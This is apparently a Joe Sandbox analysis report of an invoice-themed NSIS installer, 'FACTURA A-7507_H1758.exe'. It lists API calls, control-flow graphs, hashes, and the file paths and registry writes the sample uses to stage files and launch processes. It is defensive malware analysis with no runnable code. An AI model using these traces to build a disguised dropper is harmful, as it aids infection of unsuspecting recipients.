                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1974802433-0
                                                                                                                                                                                                                          • Opcode ID: 697524d3f53bd4141666a7acbda8ce38f50fd87c4c23088896125ab23c91ff0b
                                                                                                                                                                                                                          • Instruction ID: ca82d2f7608ddbe9a9db451b4e667c54ef54e9945bbc135f2cbc761c4928cd6d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 697524d3f53bd4141666a7acbda8ce38f50fd87c4c23088896125ab23c91ff0b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CF08275600114DBC711EBE4DD49AAEB374FF00324F2045BBE105F31E1D7B499559B2A

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403DA6
                                                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00403DC3
                                                                                                                                                                                                                          • DestroyWindow.USER32 ref: 00403DD7
                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DF3
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403E14
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E28
                                                                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403E2F
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403EDD
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403EE7
                                                                                                                                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403F01
                                                                                                                                                                                                                          • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403F52
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403FF8
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00404019
                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040402B
                                                                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 00404046
                                                                                                                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 0040405C
                                                                                                                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 00404063
                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000F4,00000000,?), ref: 0040407B
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040408E
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00423728,?,00423728,00429240), ref: 004040B7
                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,00423728), ref: 004040CB
                                                                                                                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 004041FF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                          • String ID: (7B
                                                                                                                                                                                                                          • API String ID: 3282139019-3251261122
                                                                                                                                                                                                                          • Opcode ID: dd9405652fbbb87ab488d8a14d0aeb81f33be68f6094b2cdc8f2b1d388c01c08
                                                                                                                                                                                                                          • Instruction ID: 4530f9416eb169af0d44378ddba5762a1eee688012323a74912104aead4a3b33
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd9405652fbbb87ab488d8a14d0aeb81f33be68f6094b2cdc8f2b1d388c01c08
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5C1FFB1640200FFCB206F61EE84E2B3AA8EB95745F40057EF641B21F1CB7999529B6D

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406558: GetModuleHandleA.KERNEL32(?,00000020,?,0040341F,00000009), ref: 0040656A
                                                                                                                                                                                                                            • Part of subcall function 00406558: GetProcAddress.KERNEL32(00000000,?), ref: 00406585
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,77233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe",00000000), ref: 00403A48
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,77233420), ref: 00403AC8
                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403ADB
                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403AE6
                                                                                                                                                                                                                          • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration), ref: 00403B2F
                                                                                                                                                                                                                            • Part of subcall function 004060C5: wsprintfW.USER32 ref: 004060D2
                                                                                                                                                                                                                          • RegisterClassW.USER32(004291E0), ref: 00403B6C
                                                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B84
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403BB9
                                                                                                                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403BEF
                                                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403C1B
                                                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403C28
                                                                                                                                                                                                                          • RegisterClassW.USER32(004291E0), ref: 00403C31
                                                                                                                                                                                                                          • DialogBoxParamW.USER32(?,00000000,00403D6A,00000000), ref: 00403C50
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                                                          • API String ID: 1975747703-3202460085
                                                                                                                                                                                                                          • Opcode ID: d6eb97ecc45ceecdb0e2d203f76fda1198e4e833a1627c35b81ac0c75580ce77
                                                                                                                                                                                                                          • Instruction ID: e7f44595d902892b35b801f2f0c3734befc0b18a393fec54347386a87508d522
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6eb97ecc45ceecdb0e2d203f76fda1198e4e833a1627c35b81ac0c75580ce77
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8661C570244200BAD730AF669D49E2B3A7CEB84B49F40453FF981B62E2DB7D5912C63D

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration\Varmluftsovn,?,?,00000031), ref: 004017A8
                                                                                                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration\Varmluftsovn,?,?,00000031), ref: 004017CD
                                                                                                                                                                                                                            • Part of subcall function 0040617E: lstrcpynW.KERNEL32(?,?,00000400,00403463,00429240,NSIS Error), ref: 0040618B
                                                                                                                                                                                                                            • Part of subcall function 004052DD: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                                                                                                                                                                                            • Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                                                                                                                                                                                            • Part of subcall function 004052DD: lstrcatW.KERNEL32(00422708,00402E19,00402E19,00422708,00000000,00000000,00000000), ref: 00405338
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SetWindowTextW.USER32(00422708,00422708), ref: 0040534A
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration\Varmluftsovn$C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp$C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp\System.dll$Call
                                                                                                                                                                                                                          • API String ID: 1941528284-3314272026
                                                                                                                                                                                                                          • Opcode ID: 691a1510b89acce80dd3805f8ce29c63c215ef208285089eafd6533280d8da0c
                                                                                                                                                                                                                          • Instruction ID: b64174440326d41e90dd14f1ad6608c73badddfa8ee8632f400ec40acf256ac3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 691a1510b89acce80dd3805f8ce29c63c215ef208285089eafd6533280d8da0c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C41C431900515BACF117FB5CC46DAE3679EF05329B20827BF422F51E2DA3C86629A6D

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402688
                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 004026AB
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004026C1
                                                                                                                                                                                                                            • Part of subcall function 00405E34: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405E4A
                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040276D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                                                          • API String ID: 163830602-2366072709

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          control_flow_graph 941 4057ac-4057f7 CreateDirectoryW 942 4057f9-4057fb 941->942 943 4057fd-40580a GetLastError 941->943 944 405824-405826 942->944 943->944 945 40580c-405820 SetFileSecurityW 943->945 945->942 946 405822 GetLastError 945->946 946->944
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004057EF
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405803
                                                                                                                                                                                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405818
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405822
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004057D2
                                                                                                                                                                                                                          • C:\Users\user\Desktop, xrefs: 004057AC
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                                                                                                                                                          • API String ID: 3449924974-26219170

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          control_flow_graph 947 4064e8-406508 GetSystemDirectoryW 948 40650a 947->948 949 40650c-40650e 947->949 948->949 950 406510-406519 949->950 951 40651f-406521 949->951 950->951 952 40651b-40651d 950->952 953 406522-406555 wsprintfW LoadLibraryExW 951->953 952->953
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004064FF
                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 0040653A
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040654E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                          • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                                          • API String ID: 2200240437-1946221925

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          control_flow_graph 954 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 961 4023c7-4023cf 954->961 962 402a4c-402a5b 954->962 964 4023d1-4023de call 402bbf lstrlenW 961->964 965 4023e2-4023e5 961->965 964->965 967 4023f5-4023f8 965->967 968 4023e7-4023f4 call 402ba2 965->968 972 402409-40241d RegSetValueExW 967->972 973 4023fa-402404 call 4030e7 967->973 968->967 976 402422-4024fc RegCloseKey 972->976 977 40241f 972->977 973->972 976->962 979 40281e-402825 976->979 977->976 979->962
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                                                                                                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateValuelstrlen
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp
                                                                                                                                                                                                                          • API String ID: 1356686001-1845510914

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          control_flow_graph 980 405d82-405d8e 981 405d8f-405dc3 GetTickCount GetTempFileNameW 980->981 982 405dd2-405dd4 981->982 983 405dc5-405dc7 981->983 985 405dcc-405dcf 982->985 983->981 984 405dc9 983->984 984->985
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00405DA0
                                                                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe",004033B4,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00405DBB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405D87
                                                                                                                                                                                                                          • "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe", xrefs: 00405D82
                                                                                                                                                                                                                          • nsa, xrefs: 00405D8F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                                          • API String ID: 1716503409-4199357824

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          control_flow_graph 986 10001759-10001795 call 10001b18 990 100018a6-100018a8 986->990 991 1000179b-1000179f 986->991 992 100017a1-100017a7 call 10002286 991->992 993 100017a8-100017b5 call 100022d0 991->993 992->993 998 100017e5-100017ec 993->998 999 100017b7-100017bc 993->999 1000 1000180c-10001810 998->1000 1001 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 998->1001 1002 100017d7-100017da 999->1002 1003 100017be-100017bf 999->1003 1006 10001812-1000184c call 100015b4 call 100024a9 1000->1006 1007 1000184e-10001854 call 100024a9 1000->1007 1027 10001855-10001859 1001->1027 1002->998 1008 100017dc-100017dd call 10002b5f 1002->1008 1004 100017c1-100017c2 1003->1004 1005 100017c7-100017c8 call 100028a4 1003->1005 1011 100017c4-100017c5 1004->1011 1012 100017cf-100017d5 call 10002645 1004->1012 1018 100017cd 1005->1018 1006->1027 1007->1027 1021 100017e2 1008->1021 1011->998 1011->1005 1026 100017e4 1012->1026 1018->1021 1021->1026 1026->998 1030 10001896-1000189d 1027->1030 1031 1000185b-10001869 call 1000246c 1027->1031 1030->990 1034 1000189f-100018a0 GlobalFree 1030->1034 1036 10001881-10001888 1031->1036 1037 1000186b-1000186e 1031->1037 1034->990 1036->1030 1039 1000188a-10001895 call 1000153d 1036->1039 1037->1036 1038 10001870-10001878 1037->1038 1038->1036 1040 1000187a-1000187b FreeLibrary 1038->1040 1039->1030 1040->1036
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                                                                                                                                            • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                                                                                                                                                                                            • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                                                                                                                                                            • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26345910476.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1791698881-3916222277

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          control_flow_graph 1043 401e66-401e77 call 402bbf call 4052dd call 40585e 1049 401e7c-401e81 1043->1049 1050 401e87-401e8a 1049->1050 1051 40281e-402825 1049->1051 1053 401edb-401ee4 CloseHandle 1050->1053 1054 401e8c-401e9c WaitForSingleObject 1050->1054 1052 402a4c-402a5b 1051->1052 1053->1052 1056 401eac-401eae 1054->1056 1058 401eb0-401ec0 GetExitCodeProcess 1056->1058 1059 401e9e-401eaa call 406594 WaitForSingleObject 1056->1059 1061 401ec2-401ecd call 4060c5 1058->1061 1062 401ecf-401ed2 1058->1062 1059->1056 1061->1053 1062->1053 1063 401ed4 1062->1063 1063->1053
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 004052DD: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                                                                                                                                                                                            • Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                                                                                                                                                                                            • Part of subcall function 004052DD: lstrcatW.KERNEL32(00422708,00402E19,00402E19,00422708,00000000,00000000,00000000), ref: 00405338
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SetWindowTextW.USER32(00422708,00422708), ref: 0040534A
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                                                                                                                                                                                            • Part of subcall function 0040585E: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 00405887
                                                                                                                                                                                                                            • Part of subcall function 0040585E: CloseHandle.KERNEL32(?), ref: 00405894
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3585118688-0
                                                                                                                                                                                                                          • Opcode ID: ea69566b590d7baadefbea0acf4950f243a978aaa9f1905751507829e3954413
                                                                                                                                                                                                                          • Instruction ID: 5702df78c33f9bd13decba52644e1012fe72a42f767711efff684f6f7274af03
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea69566b590d7baadefbea0acf4950f243a978aaa9f1905751507829e3954413
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF11A131900508EBCF21AF91CD4499E7AB6AF40314F21407BFA05B61F1D7798A92DB99
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00405BDD: CharNextW.USER32(?,?,00425F30,?,00405C51,00425F30,00425F30, 4#w.#w,?,77232EE0,0040598F,?,77233420,77232EE0,00000000), ref: 00405BEB
                                                                                                                                                                                                                            • Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405BF0
                                                                                                                                                                                                                            • Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405C08
                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                                                                                                                                                            • Part of subcall function 004057AC: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004057EF
                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration\Varmluftsovn,?,00000000,000000F0), ref: 00401645
                                                                                                                                                                                                                          Strings
